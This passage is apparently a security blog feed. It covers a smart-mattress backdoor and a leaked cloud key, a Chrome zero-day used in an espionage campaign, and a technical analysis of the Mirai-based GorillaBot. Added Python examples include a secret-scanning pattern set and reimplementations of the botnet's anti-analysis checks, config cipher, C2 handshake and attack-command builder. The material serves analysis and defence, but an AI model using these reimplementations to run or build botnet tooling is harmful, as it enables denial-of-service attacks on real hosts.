One could use an SSH connection like this to spy on the Pod’s owner — to find out when they’re sleeping or when they spend the night away from home. It would even be possible to check if there’s one person in bed or two. Having this type of control could also let someone play pranks on the owner by changing the temperature of the Pod, turning the alarm clock on or off, adjusting the geometry of the bed base, and so on.
Nothing like that seems to have happened to Eight Sleep Pod owners yet, but something like it could; theoretical possibilities like this sometimes do materialize. This is what recently happened with Ecovacs robot vacuums: pranksters used vulnerabilities in these devices to harass their owners.
Smart mattress hack No. 2: an AWS key in the firmware
While still looking at the Eight Sleep Pod firmware, Dylan discovered a valid AWS (Amazon Web Services) key in its code — used to continuously upload telemetry to the cloud. Again this is only theoretical, but if the key fell into the wrong hands it could lead to serious violations of user privacy.
(Not the) best practices for programming smart devices: hardcoded AWS key in the firmware accessible to anyone
For better or for worse, the full truth about the presence of an Amazon key won’t come out. Dylan notified Eight Sleep, and by the time his research was published the key had already been revoked. However, the mere presence of the key within the firmware, where it was accessible to anyone, was clear evidence that user security and privacy were taken lightly.
Dylan further adds that the key could have, at the very least, been used to cause financial damage to the company by sending a large number of meaningless requests to the AWS cloud.
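The two findings above, an AWS access key ID and an SSH public key sitting in world-downloadable firmware, are exactly what a quick secret scan over an unpacked firmware tree catches. The scanner below is an added example (not the researcher's tooling, and not Eight Sleep code): it walks a directory, flags AWS access key IDs by their AKIA/ASIA prefix, and reports SSH public keys together with the comment field that usually carries an email address. The sample files are constructed, and the key ID is the placeholder AWS uses in its own documentation.

```python
"""Scan an unpacked firmware tree for hardcoded AWS key IDs and SSH public keys.
Added example code; sample file contents are constructed, not from any firmware."""
import os
import re

# AWS access key IDs are 20 chars: AKIA (long-term) or ASIA (temporary) + 16.
AWS_KEY_ID = re.compile(r"(?<![A-Z0-9])(?:AKIA|ASIA)[A-Z0-9]{16}(?![A-Z0-9])")
# authorized_keys / id_*.pub style lines: type, base64 blob, optional comment.
SSH_PUBKEY = re.compile(
    r"^(?P<type>ssh-(?:rsa|ed25519)|ecdsa-sha2-nistp(?:256|384|521))\s+"
    r"(?P<blob>[A-Za-z0-9+/]+=*)(?:[ \t]+(?P<comment>\S+))?",
    re.MULTILINE,
)
MAX_FILE_BYTES = 16 * 1024 * 1024  # skip huge blobs (squashfs images, etc.)


def scan_text(path: str, text: str) -> list:
    """Return one finding dict per AWS key ID or SSH public key in `text`."""
    findings = []
    for m in AWS_KEY_ID.finditer(text):
        findings.append({"path": path, "kind": "aws_access_key_id", "value": m.group(0)})
    for m in SSH_PUBKEY.finditer(text):
        findings.append({"path": path, "kind": "ssh_public_key",
                         "value": m.group("type"), "comment": m.group("comment") or ""})
    return findings


def scan_tree(root: str) -> list:
    """Walk `root` (an extracted firmware directory) and scan every regular file."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                if os.path.islink(path) or os.path.getsize(path) > MAX_FILE_BYTES:
                    continue
                with open(path, "rb") as fh:
                    text = fh.read().decode("latin-1")  # binaries scan fine as latin-1
            except OSError:
                continue
            findings.extend(scan_text(path, text))
    return findings


# Constructed stand-in for an unpacked rootfs; AKIAIOSFODNN7EXAMPLE is AWS's documented placeholder.
SAMPLE_FILES = {
    "rootfs/etc/telemetry.conf": "aws_access_key_id = AKIAIOSFODNN7EXAMPLE\nregion = us-east-1\n",
    "rootfs/root/.ssh/authorized_keys":
        "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleKeyBlobNotARealKey0000 engineering@example.com\n",
    "rootfs/bin/busybox": "\x7fELF...no secrets here...\n",
}


def scan_samples() -> list:
    """Run the text scanner over the constructed sample tree."""
    return [f for path, text in SAMPLE_FILES.items() for f in scan_text(path, text)]


if __name__ == "__main__":
    import sys
    results = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else scan_samples()
    for f in results:
        print(f"{f['path']}: {f['kind']} {f['value']} {f.get('comment', '')}".rstrip())
```

Run it as `python scan.py /path/to/unpacked-firmware` after extracting the image (for example with binwalk); a hit for an AKIA/ASIA ID should be followed by checking whether the key is still active, and a public key in authorized_keys tells you who can log in, not merely that someone can.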
Smart mattress hack No. 3: jailbreaking with the help of an aquarium chiller
Clearly inspired by his earlier findings, Dylan decided to attempt jailbreaking the Pod — that is, detaching it from Eight Sleep’s cloud services. Dylan took a drastic approach: he disconnected the external unit (with all its smart electronics and internet connectivity).
Detaching an Eight Sleep smart mattress from the cloud using a $150 aquarium chiller
Dylan replaced the Eight Sleep Hub with… a common aquarium chiller. This system, in contrast, doesn’t require an app or a subscription fee, collects no user data, comes without any backdoors, and runs perfectly well without an internet connection. What it does do is effectively adjust the temperature of your bed, and, just as importantly, it costs only $150.
For those who prefer a less radical approach to the issue of Eight Sleep products being tied to the vendor cloud, Free Sleep offers a solution. This is an open-source software suite that allows you to take control of your smart mattress.
Want to know what other unexpected devices have been successfully hacked? Here you go!…
Posted by admin, 2025-03-26 15:06:56: How to hack an Eight Sleep smart mattress "Pod" | Kaspersky official blog
Our exploit detection and prevention technologies have detected a new wave of cyberattacks with previously unknown malware. While analyzing it, our Global Research and Analysis Team (GReAT) experts realized that we’re dealing with a technically sophisticated targeted attack, which suggests that a state-sponsored APT group is behind it. The attack exploited a zero-day vulnerability in the Chrome browser, which we immediately reported to Google; the company promptly released a patch to fix it.
What is the Operation ForumTroll APT attack?
The attack starts with an email with a phishing invitation to the Primakov Readings international economic and political science forum. There are two links in the email’s body, which pretend to lead to the program of the event and the registration form for participants, but which actually lead to the malefactor’s website. If a Windows PC user with the Google Chrome browser (or any other browser based on the Chromium engine) clicks them, their computer gets infected with no additional action required from the victim’s side.
Next, the exploit for the CVE-2025-2783 vulnerability comes into play — helping to circumvent the Chrome browser’s defense mechanism. It’s too early to talk about technical details, but the essence of the vulnerability comes down to an error in logic at the intersection of Chrome and the Windows operating system that allows bypassing the browser’s sandbox protection.
A slightly more detailed technical description of the attack along with the indicators of compromise can be found on our Securelist blog. Our GReAT experts will publish a thorough technical analysis of the vulnerability and APT attack once the majority of browser users install the newly-released patch.
Who are the targets of the Operation ForumTroll APT attack?
Fake event invitations containing personalized links were sent to Russian media representatives, employees of educational institutions and governmental organizations. According to our GReAT experts the goal of the attackers was espionage.
How to stay safe
At the time of writing this post, the attack was no longer active: the phishing link redirected users to the legitimate Primakov Readings website. However, the malefactors could reactivate the exploit delivery mechanism at any time and start the next wave of the attack.
Thanks to our experts’ analysis, Google Chrome’s developers have promptly fixed the CVE-2025-2783 vulnerability today, and thus we advise you to check that your organization uses the browser updated to at least the 134.0.6998.177/.178 version.
In addition, we recommend using reliable security solutions equipped with modern exploit detection and prevention technologies on all internet-connected corporate devices. Our products successfully detect all exploits and other malware used in this APT attack.
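Checking that a fleet is on at least 134.0.6998.177 sounds trivial, but the classic mistake is comparing version strings lexically, which ranks 134.0.6998.89 above 134.0.6998.177. The following added example (not Kaspersky's or Google's tooling) parses four-part Chrome versions into integer tuples and reports which hosts in an inventory still need the fix; the inventory is constructed, and the `google-chrome --version` banner format is an assumption about the local binary.

```python
"""Version gate for the CVE-2025-2783 fix in Google Chrome. Added example code."""
import re
import subprocess

FIXED_MIN = (134, 0, 6998, 177)  # fixed builds named in the advisory: .177 and .178
VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)\.(\d+)")


def parse_version(text: str) -> tuple:
    """Pull the first four-part version out of a string such as 'Google Chrome 134.0.6998.178'."""
    m = VERSION_RE.search(text)
    if not m:
        raise ValueError(f"no four-part version in {text!r}")
    return tuple(int(x) for x in m.groups())


def is_fixed(version_text: str) -> bool:
    """Numeric tuple comparison, so 134.0.6998.89 correctly ranks below .177."""
    return parse_version(version_text) >= FIXED_MIN


def unpatched_hosts(inventory: dict) -> list:
    """Return hostnames whose reported Chrome version predates the fix, sorted."""
    return sorted(host for host, ver in inventory.items() if not is_fixed(ver))


def installed_chrome_version(binary: str = "google-chrome") -> tuple:
    """Query a local Chrome binary (assumption: it prints 'Google Chrome X.Y.Z.W')."""
    out = subprocess.run([binary, "--version"], capture_output=True, text=True, check=True).stdout
    return parse_version(out)


# Constructed inventory, e.g. as exported from an endpoint-management tool.
SAMPLE_INVENTORY = {
    "ws-001": "Google Chrome 134.0.6998.178",
    "ws-002": "Google Chrome 134.0.6998.89",   # string compare would wrongly pass this
    "ws-003": "Google Chrome 133.0.6943.141",
    "ws-004": "Google Chrome 135.0.7049.52",
}

if __name__ == "__main__":
    print("needs update:", unpatched_hosts(SAMPLE_INVENTORY))
```

Other Chromium-based browsers carry their own version numbers, so the same sandbox-escape fix lands under a different build number for each vendor; compare against that vendor's advisory rather than the Chrome threshold.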
Posted by admin, 2025-03-25 22:06:48: CVE-2025-2783 in Operation ForumTroll APT | Kaspersky official blog
Editor’s note: The current article is authored by Mohamed Talaat, a cybersecurity researcher and malware analyst. You can find Mohamed on X and LinkedIn.
In this article, we’re diving into GorillaBot, a newly discovered botnet built on Mirai’s code. It’s been spotted launching hundreds of thousands of attacks across the globe, and it’s got some interesting tricks up its sleeve.
We’ll walk through how it talks to its command-and-control (C2) servers, how it receives instructions, and the methods it uses to carry out attacks.
Overview
“GorillaBot” is a newly discovered Mirai-based botnet that has been actively targeting systems in over 100 countries. According to the NSFOCUS Global Threat Hunting team, the botnet issued more than 300,000 attack commands between September 4 and September 27.
This malware variant poses a serious cyber threat, affecting a wide range of industries — including telecommunications, financial institutions, and even the education sector — prompting an urgent need for response and mitigation.
Key Takeaways
GorillaBot is a Mirai-based botnet that reuses core logic while adding custom encryption and evasion techniques.
It targets a wide range of industries and has launched over 300,000 attacks across more than 100 countries.
The botnet uses raw TCP sockets for C2 communication and a custom XTEA-like cipher to protect embedded configuration such as the C2 address.
GorillaBot includes anti-debugging and anti-analysis checks, exiting immediately in containerized or honeypot environments.
The malware authenticates to its C2 server using a SHA-256-based token generated from a hardcoded array and server-provided value.
Attack commands are encoded and hashed, then passed to a Mirai-style attack_parse function for execution.
Technical Analysis
In this section, we will examine the technical details of GorillaBot, focusing on its C2 communication protocol and how it receives information about its targets and the attack methods it’s instructed to use.
Anti-Debugging
Before proceeding with its main activity, GorillaBot performs checks to detect the presence of debugging tools. One of its first actions is to read the /proc/self/status file and inspect the TracerPid field. This field indicates whether the process is being traced – a value of 0 means it’s not, while a non-zero value suggests a debugger is attached.
Reading the /proc/self/status file and inspecting the TracerPid field
Another technique that “GorillaBot” uses to detect debuggers is to register a callback function that will pause and then exit upon receiving a SIGTRAP signal.
Detection of debuggers by Gorillabot
Environment check
GorillaBot is highly selective about the environment it runs in. It first ensures that it is operating on a legitimate target machine rather than inside a honeypot or container. To do this, it performs several checks for system-level artifacts that may not be present in those scenarios.
The code shows that it initially checks for access to the “/proc” file system – a virtual file system that provides user-space processes with information about the kernel and running processes.
In a typical Linux environment, the presence of the “/proc” file system is expected. If it’s missing, GorillaBot assumes it is being analyzed in a honeypot and exits immediately.
/proc check to detect non-standard environments
GorillaBot uses another check to detect Kubernetes containerization by examining a specific file in the “/proc” directory, namely “/proc/1/cgroup.” It looks for the string “kubepods.” If this string is found, GorillaBot recognizes that it is running in a container and terminates its execution to avoid detection.
Containerization checks by GorillaBot
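The four checks above (TracerPid, a SIGTRAP handler, the presence of /proc, and "kubepods" in /proc/1/cgroup) are simple enough to reproduce, and doing so is useful for an analyst who wants to know which of them a given sandbox or debugging setup would trip. The harness below is an added example, not GorillaBot's code: it parses the same procfs fields the bot reads, reports every check instead of exiting, and installs a SIGTRAP handler shaped like the one the article describes. A standard Linux procfs layout is assumed, and the "pause" in the handler is assumed to be a short sleep.

```python
"""Analyst harness re-creating GorillaBot's described self-checks. Added example code."""
import os
import signal
import sys
import time

PROC_ROOT = "/proc"  # assumption: a standard Linux procfs mount


def tracer_pid_from_status(status_text: str) -> int:
    """Return the TracerPid value from a /proc/<pid>/status document.

    0 means no tracer; a non-zero value is the PID of the attached debugger.
    -1 means the field is absent, which a cautious check treats as suspicious.
    """
    for line in status_text.splitlines():
        if line.startswith("TracerPid:"):
            return int(line.split(":", 1)[1].strip())
    return -1


def cgroup_mentions_kubepods(cgroup_text: str) -> bool:
    """True if any cgroup line names 'kubepods', i.e. a Kubernetes pod slice."""
    return any("kubepods" in line for line in cgroup_text.splitlines())


def debugger_attached() -> bool:
    """Read the live status file; an unreadable procfs counts as 'bail out'."""
    try:
        with open(os.path.join(PROC_ROOT, "self", "status")) as fh:
            return tracer_pid_from_status(fh.read()) != 0
    except OSError:
        return True


def kubernetes_container() -> bool:
    """Same file the bot inspects: the init process's cgroup membership."""
    try:
        with open(os.path.join(PROC_ROOT, "1", "cgroup")) as fh:
            return cgroup_mentions_kubepods(fh.read())
    except OSError:
        return False


def environment_verdict() -> dict:
    """Run every check the article attributes to GorillaBot, without exiting."""
    return {
        "proc_present": os.path.isdir(PROC_ROOT),
        "debugger_attached": debugger_attached(),
        "kubernetes_container": kubernetes_container(),
    }


def install_sigtrap_exit(delay_seconds: float = 1.0) -> None:
    """Register a SIGTRAP callback that pauses, then exits, as described for the bot."""
    def handler(signum, frame):
        time.sleep(delay_seconds)  # the 'pause' is assumed to be a short sleep
        os._exit(1)
    signal.signal(signal.SIGTRAP, handler)


if __name__ == "__main__":
    install_sigtrap_exit()
    verdict = environment_verdict()
    print(verdict)
    # The bot exits on any failed check; the harness only reports the reason.
    clean = verdict["proc_present"] and not verdict["debugger_attached"] \
        and not verdict["kubernetes_container"]
    sys.exit(0 if clean else 2)
```

Run it under `strace` or `gdb` and the TracerPid check flips; run it inside a Kubernetes pod and the cgroup check flips. A sandbox that wants this family to detonate has to present a readable /proc, a TracerPid of 0 and a cgroup path that does not advertise Kubernetes.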
Encryption & Decryption Algorithms
One of the more intriguing features of this Mirai-based botnet is its use of encryption and decryption techniques to obscure key strings and hide internal configuration data.
Researchers observed that GorillaBot uses a simple Caesar cipher with a shift of 3 to decrypt specific strings. In addition, it employs a custom block cipher – which we’ll examine later in this article – to decrypt more complex internal configurations. These methods help the malware avoid static detection and make reverse engineering more difficult.
The use of Caesar cipher by GorillaBot
Network Communication
Initial C2 Communication
Like many other Mirai-based botnets, GorillaBot uses raw TCP sockets for command-and-control (C2) communication, rather than higher-level protocols like HTTP or HTTPS.
The process begins with the malware establishing a connection to its C2 server – the server’s IP address is decrypted at runtime using what appears to be a custom implementation of the XTEA (Extended Tiny Encryption Algorithm).
The cipher closely resembles TEA or XTEA, employing a 128-bit (16-byte) hardcoded key for both encryption and decryption.
During each iteration of the algorithm, a delta value is subtracted from the sum.
Decryption of C2 IP using custom XTEA-like algorithm
The function begins by calculating the length of the provided data. It does this by iterating until it encounters the first NULL character.
Once the length is known, it proceeds to pack the key. Since the key is given as a serialized sequence of bytes, it must be organized into an array of four 32-bit words before the function can perform either encryption or decryption.
Key packing and data length calculation before encryption/decryption
After the key is prepared and the data length calculated, the function checks a mode parameter to decide whether to encrypt or decrypt. It then enters a loop to iterate over the data for either process.
Mode parameter check
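To confirm that the routine is really XTEA (as opposed to a tweaked variant), it helps to have a reference implementation in the same shape as the decompiled function: measure the NUL-terminated buffer, pack the serialized key into four 32-bit words, then branch on a mode parameter and loop over the data. The block below is an added example, not GorillaBot's code; it uses the standard XTEA delta, 32 cycles and big-endian word order, all of which are assumptions to check against the disassembly, and its key and C2 address are constructed. Feed it the bot's real key and blob and compare the output with what the sandbox shows the bot connecting to.

```python
"""Reference XTEA in the calling convention the article describes. Added example code."""
import struct

DELTA = 0x9E3779B9   # standard XTEA delta (assumed to match the bot's)
ROUNDS = 32          # 32 cycles, the XTEA default (assumed)
MASK = 0xFFFFFFFF
MODE_ENCRYPT, MODE_DECRYPT = 0, 1


def cstring_length(buf: bytes) -> int:
    """Length up to the first NUL byte, as the bot measures its input."""
    nul = buf.find(b"\x00")
    return len(buf) if nul < 0 else nul


def pack_key(key: bytes) -> tuple:
    """Serialized 16-byte key -> four 32-bit words (big-endian assumed)."""
    if len(key) != 16:
        raise ValueError("XTEA needs a 16-byte key")
    return struct.unpack(">4I", key)


def _encrypt_block(v0: int, v1: int, k: tuple) -> tuple:
    s = 0
    for _ in range(ROUNDS):
        v0 = (v0 + ((((v1 << 4) ^ (v1 >> 5)) + v1) ^ (s + k[s & 3]))) & MASK
        s = (s + DELTA) & MASK
        v1 = (v1 + ((((v0 << 4) ^ (v0 >> 5)) + v0) ^ (s + k[(s >> 11) & 3]))) & MASK
    return v0, v1


def _decrypt_block(v0: int, v1: int, k: tuple) -> tuple:
    s = (DELTA * ROUNDS) & MASK
    for _ in range(ROUNDS):  # each iteration subtracts delta from the sum
        v1 = (v1 - ((((v0 << 4) ^ (v0 >> 5)) + v0) ^ (s + k[(s >> 11) & 3]))) & MASK
        s = (s - DELTA) & MASK
        v0 = (v0 - ((((v1 << 4) ^ (v1 >> 5)) + v1) ^ (s + k[s & 3]))) & MASK
    return v0, v1


def xtea_blocks(data: bytes, key: bytes, mode: int) -> bytes:
    """ECB over exactly len(data) bytes, which must be a multiple of 8."""
    if len(data) % 8:
        raise ValueError("data must be a whole number of 8-byte blocks")
    k = pack_key(key)
    step = _decrypt_block if mode == MODE_DECRYPT else _encrypt_block
    out = bytearray()
    for off in range(0, len(data), 8):
        v0, v1 = struct.unpack(">2I", data[off:off + 8])
        out += struct.pack(">2I", *step(v0, v1, k))
    return bytes(out)


def xtea_cstring(buf: bytes, key: bytes, mode: int) -> bytes:
    """The bot's convention: measure to the first NUL, then process the whole
    8-byte blocks inside that span. A trailing partial block is dropped here;
    how the bot handles one is an assumption to verify."""
    n = cstring_length(buf) // 8 * 8
    return xtea_blocks(buf[:n], key, mode)


def decrypt_c2_address(blob: bytes, key: bytes) -> str:
    """Decrypt an embedded C2 address blob and return the text up to its NUL."""
    plain = xtea_blocks(blob, key, MODE_DECRYPT)
    return plain[:cstring_length(plain)].decode("ascii", "replace")


if __name__ == "__main__":
    key = bytes(range(16))                      # constructed key, not the bot's
    plain = b"203.0.113.7".ljust(16, b"\x00")   # constructed C2 address (TEST-NET-3)
    blob = xtea_blocks(plain, key, MODE_ENCRYPT)
    print(blob.hex(), "->", decrypt_c2_address(blob, key))
```

Note that measuring the input with a NUL scan is fine for plaintext but truncates any ciphertext that happens to contain a zero byte; if the bot stores its blob that way, either the blob is chosen to be NUL-free or the length is fixed elsewhere, and that is worth checking before trusting a decrypted address.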
GorillaBot authentication mechanism with the C2 server
After successfully connecting to the C2 server, the malware initiates the authentication process to identify itself to the server.
This process begins with the malware sending a 1-byte TCP probe packet to the C2 server. In response, the server replies with a 4-byte TCP packet that includes a “magic” 4-byte value. This value is then used to generate the bot ID for the authentication process.
C2 communication shown in ANY.RUN’s Interactive Sandbox
The returned 4-byte magic value is combined with a 32-byte encrypted array to produce the bot ID, or authentication token. The key detail is how the two are combined.
The same cipher previously described is applied to decrypt the 32-byte hardcoded array. Once decrypted, the data is copied into a separate buffer and concatenated with the 4-byte magic value.
The combined data is then hashed using SHA-256 before being sent back to the command and control (C2) server as the identification token.
Decrypted array and magic value combined, then hashed with SHA-256
In the screenshot below, you can see the generated SHA-256 token, which is created by combining the 4-byte magic value received from the C2 server with the decrypted 32-byte hardcoded array.
The generated SHA-256 token
C2 communication continues once the server has authenticated the bot. The server responds with a packet that appears to be a flag, 0x01, confirming the bot's authenticity. On the C2 side, a list of accepted bot IDs (most likely SHA-256 hashes) is presumably maintained and checked against the received ID, so that only a legitimate bot instance, and not an unauthorized client probing the C2 infrastructure, is allowed to proceed.
C2 server responds with 0x01 flag to confirm bot authentication
In the screenshot above, after successfully sending the SHA-256 hash (bot ID), the bot receives a 1-byte response. This response is checked against “01,” which indicates successful authentication. Following this, the bot replies with a 4-byte packet containing the bytes “00 00 00 01.” This is likely the bot acknowledging receipt of the flag packet.
Afterwards, GorillaBot behaves like the original Mirai bot: it calculates the length of a 32-byte ID buffer, sends that length to the C2 server, and then transmits the ID buffer itself.
Mirai code snippet
The code snippet above is taken from the leaked Mirai source and includes a check for the number of arguments. If a second argument is provided, it is copied to “id_buf,” which has a length of exactly 32 bytes.
This behavior is consistent with that observed in the Mirai-based variant “GorillaBot.” During its initial communication with the command-and-control (C2) server, GorillaBot first sends the length of the buffer, followed by the buffer itself – mirroring the original Mirai implementation.
GorillaBot mimics Mirai by sending buffer length, then the buffer
The screenshot below summarizes the initial C2 communication, validating the connection to ensure it comes from the intended source. This is crucial so that only authenticated connections receive attack commands.
Summary of initial C2 communication
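The whole handshake described above (probe, magic, SHA-256 token, 0x01 flag, 4-byte acknowledgement, then the Mirai-style length-prefixed ID) can be replayed offline with both sides in one process, which is handy for writing a C2 emulator or a network signature. The block below is an added example, not the bot's or any real C2's code, and it runs over a socketpair so no network is needed. Assumptions: the decrypted 32-byte array precedes the 4-byte magic in the hashed input, the ID length prefix is a single byte as in Mirai, and the C2 recomputes the expected token from the shared array rather than consulting a fixed hash list (the article only speculates about the server side). The 32-byte array is a constructed stand-in for the value the bot decrypts.

```python
"""Both sides of GorillaBot's described authentication handshake. Added example code."""
import hashlib
import hmac
import socket
import struct

# Constructed stand-in for the bot's decrypted 32-byte array.
SECRET = bytes.fromhex("00112233445566778899aabbccddeeff" * 2)
PROBE = b"\x00"                # 1-byte probe the bot sends first
AUTH_OK = b"\x01"              # server flag confirming authentication
BOT_ACK = b"\x00\x00\x00\x01"  # bot's 4-byte acknowledgement of the flag


def build_auth_token(magic: bytes, secret: bytes = SECRET) -> bytes:
    """SHA-256(decrypted array || magic): the token the bot sends as its ID."""
    if len(magic) != 4 or len(secret) != 32:
        raise ValueError("magic must be 4 bytes and the array 32 bytes")
    return hashlib.sha256(secret + magic).digest()


def recv_exact(sock: socket.socket, n: int) -> bytes:
    """Read exactly n bytes; the protocol has fixed-size fields, not delimiters."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed the connection")
        buf += chunk
    return buf


def run_handshake(magic: bytes, bot_secret: bytes, id_buf: bytes = b"",
                  c2_secret: bytes = SECRET) -> dict:
    """Drive bot and C2 step by step; returns the verdict and a message log."""
    bot, c2 = socket.socketpair()
    log = []

    def send(who: str, sock: socket.socket, data: bytes) -> None:
        sock.sendall(data)
        log.append((who, data))

    try:
        send("bot", bot, PROBE)
        recv_exact(c2, 1)
        send("c2", c2, magic)                                   # 4-byte magic
        token = build_auth_token(recv_exact(bot, 4), bot_secret)
        send("bot", bot, token)                                 # 32-byte ID
        ok = hmac.compare_digest(recv_exact(c2, 32), build_auth_token(magic, c2_secret))
        send("c2", c2, AUTH_OK if ok else b"\x00")
        if recv_exact(bot, 1) != AUTH_OK:
            return {"authenticated": False, "token": token, "log": log}
        send("bot", bot, BOT_ACK)
        id_buf = id_buf[:32]                                    # Mirai's id_buf is 32 bytes
        send("bot", bot, struct.pack("B", len(id_buf)))         # length first...
        if id_buf:
            send("bot", bot, id_buf)                            # ...then the buffer
        recv_exact(c2, 4)
        n = recv_exact(c2, 1)[0]
        seen_id = recv_exact(c2, n) if n else b""
        return {"authenticated": True, "token": token, "id": seen_id, "log": log}
    finally:
        bot.close()
        c2.close()


if __name__ == "__main__":
    result = run_handshake(b"\xde\xad\xbe\xef", SECRET, b"bot-01")
    for who, data in result["log"]:
        print(f"{who:>3} -> {data.hex()}")
    print("authenticated:", result["authenticated"])
```

The message sizes (1, 4, 32, 1, 4, then 1 + n) are what a network signature can key on, since the token itself changes with every magic value; a bot that knows the wrong array still completes the first three messages and only fails at the flag.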
Processing Attack Commands
Once the bot has been authenticated, the next stage in the C2 communication process involves receiving a packet containing attack target information – essentially, instructions to initiate an attack.
In the example screenshot below, the first step is to read the length of the incoming packet from the socket. The malware then reads that many bytes from the C2 server; those bytes constitute the attack packet.
Reading packet length from C2 server to begin data retrieval
Attack Command packet structure
Below is the structure of the received attack packet along with the corresponding packet capture bytes. The time gap in receiving the length of the entire packet (highlighted in red in the capture) and the actual attack packet is minimal. As a result, it may seem as if they were concatenated into one packet and received simultaneously; however, they were actually received separately.
The packet structure is quite simple. First comes a 32-byte SHA-256 hash (highlighted in yellow), used to verify the integrity of the command that follows. After it come the encoded bytes of the attack command (highlighted in blue), which are decoded with the same Caesar shift cipher mentioned earlier before being parsed.
Once the integrity of the encoded attack command is verified, it is decoded and passed to “attack_parse.” This function is responsible for extracting target information, determining the specific attack method, and then handing off control to the appropriate attack function for execution.
Decoded attack command passed to attack_parse
The “attack_parse” function closely resembles the original Mirai code, as it processes the provided buffer containing the attack command in a similar manner. Notably, it supports attack commands both with and without options, just like the original Mirai.
Mirai vs. GorillaBot
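Putting the attack-packet handling together in code makes the Mirai lineage concrete: GorillaBot wraps a Caesar-shifted command in a SHA-256 digest, but what comes out after decoding has the layout that the leaked Mirai attack_parse expects, with or without options. The block below is an added example, not GorillaBot's code. Assumptions: the digest covers the encoded command that follows it (a hash cannot cover itself), the shift of 3 is applied byte-wise modulo 256, and the length prefix is a 2-byte big-endian value as in Mirai; the field layout and vector IDs follow the leaked Mirai source, and the sample command targets a documentation address.

```python
"""Framing and parsing of GorillaBot's attack command as described. Added example code."""
import hashlib
import hmac
import ipaddress
import struct

SHIFT = 3
# Attack vector IDs from the leaked Mirai source (attack.h).
VECTORS = {0: "udp", 1: "vse", 2: "dns", 3: "syn", 4: "ack", 5: "stomp",
           6: "greip", 7: "greeth", 9: "udp_plain", 10: "http"}


def caesar(data: bytes, shift: int) -> bytes:
    """Byte-wise Caesar shift; pass -SHIFT to decode."""
    return bytes((b + shift) & 0xFF for b in data)


def attack_parse(buf: bytes) -> dict:
    """Mirai layout: duration u32 BE | vector u8 | n_targets u8 |
    (ipv4 u32 + prefix u8) * n_targets | n_opts u8 | (key u8, len u8, value) * n_opts."""
    off = 0

    def take(n: int) -> bytes:
        nonlocal off
        if off + n > len(buf):
            raise ValueError("truncated attack command")
        chunk = buf[off:off + n]
        off += n
        return chunk

    duration, vector, n_targets = struct.unpack(">IBB", take(6))
    if n_targets == 0:
        raise ValueError("attack command without targets")
    targets = []
    for _ in range(n_targets):
        ip_raw, prefix = struct.unpack(">4sB", take(5))
        targets.append((str(ipaddress.IPv4Address(ip_raw)), prefix))
    options = {}
    for _ in range(take(1)[0]):            # zero options is valid, as in Mirai
        key, vlen = take(2)
        options[key] = take(vlen)
    return {"duration": duration, "vector": VECTORS.get(vector, f"unknown({vector})"),
            "targets": targets, "options": options}


def build_command(duration: int, vector: int, targets: list, options: dict = None) -> bytes:
    """Inverse of attack_parse, used to construct test traffic."""
    out = struct.pack(">IBB", duration, vector, len(targets))
    for ip, prefix in targets:
        out += ipaddress.IPv4Address(ip).packed + struct.pack("B", prefix)
    options = options or {}
    out += struct.pack("B", len(options))
    for key, value in options.items():
        out += struct.pack("BB", key, len(value)) + value
    return out


def frame(command: bytes) -> bytes:
    """Length prefix, then SHA-256 of the encoded command, then the encoded command."""
    encoded = caesar(command, SHIFT)
    body = hashlib.sha256(encoded).digest() + encoded
    return struct.pack(">H", len(body)) + body


def unframe_and_parse(stream: bytes) -> dict:
    """What the bot does on receipt: read length, verify digest, decode, parse."""
    (length,) = struct.unpack(">H", stream[:2])
    body = stream[2:2 + length]
    if len(body) != length or length < 32:
        raise ValueError("short attack packet")
    digest, encoded = body[:32], body[32:]
    if not hmac.compare_digest(hashlib.sha256(encoded).digest(), digest):
        raise ValueError("integrity check failed")
    return attack_parse(caesar(encoded, -SHIFT))


if __name__ == "__main__":
    # Constructed command: 60 s UDP flood at 203.0.113.5/32, option 0 (payload size) = "512".
    packet = frame(build_command(60, 0, [("203.0.113.5", 32)], {0: b"512"}))
    print(packet.hex())
    print(unframe_and_parse(packet))
```

The digest gives integrity, not authenticity: anyone who knows the shift can mint a valid packet, so it protects the bot from corrupted commands rather than from a takeover of the C2 channel, which is a useful property when building a sinkhole.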
Conclusion
GorillaBot may not reinvent the wheel, but it’s a strong reminder that old code can still pack a punch when reused in clever ways. By building on Mirai’s foundation and adding its own tweaks to communication, encryption, and evasion techniques, GorillaBot proves that legacy malware lives on and evolves.
To better understand threats like GorillaBot, the use of malware analysis tools like ANY.RUN’s Interactive Sandbox is important. It lets you dive into live malware behavior: from unpacking encrypted payloads to monitoring C2 communication in real time.
Curious to see it in action? Try ANY.RUN now to explore malware samples like GorillaBot hands-on and uncover the tactics they use during attacks to strengthen your defenses.
Posted by admin, 2025-03-25 12:06:41: GorillaBot: Technical Analysis and Code Similarities with Mirai